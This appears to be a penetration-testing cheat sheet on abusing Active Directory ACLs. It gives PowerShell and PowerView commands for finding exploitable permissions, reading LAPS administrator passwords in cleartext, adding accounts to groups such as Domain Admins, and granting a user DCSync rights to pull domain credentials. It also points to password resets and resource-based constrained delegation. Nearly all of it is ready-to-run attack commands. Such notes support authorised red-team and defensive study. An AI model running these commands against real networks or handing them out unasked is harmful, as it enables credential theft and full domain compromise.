ACL Abuse

Enumeration

ADModule
PowerView_Dev
PowerView
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
​
# Get DistinguishedName
Get-ADUser -Identity USER
​
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
Find-InterestingDomainACL -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.
LAPS Module
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
​
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
​
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group
ADModule
PowerView_dev
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
​
# Check
Get-ADGroupMember -Identity "LocalAdmins"
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack
​

GenericAll over User Object

Can reset their password without knowing the old one
​

WriteDACL over DC

Can give DCSync privs to user
RACE
PowerView3
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
​

Resources

​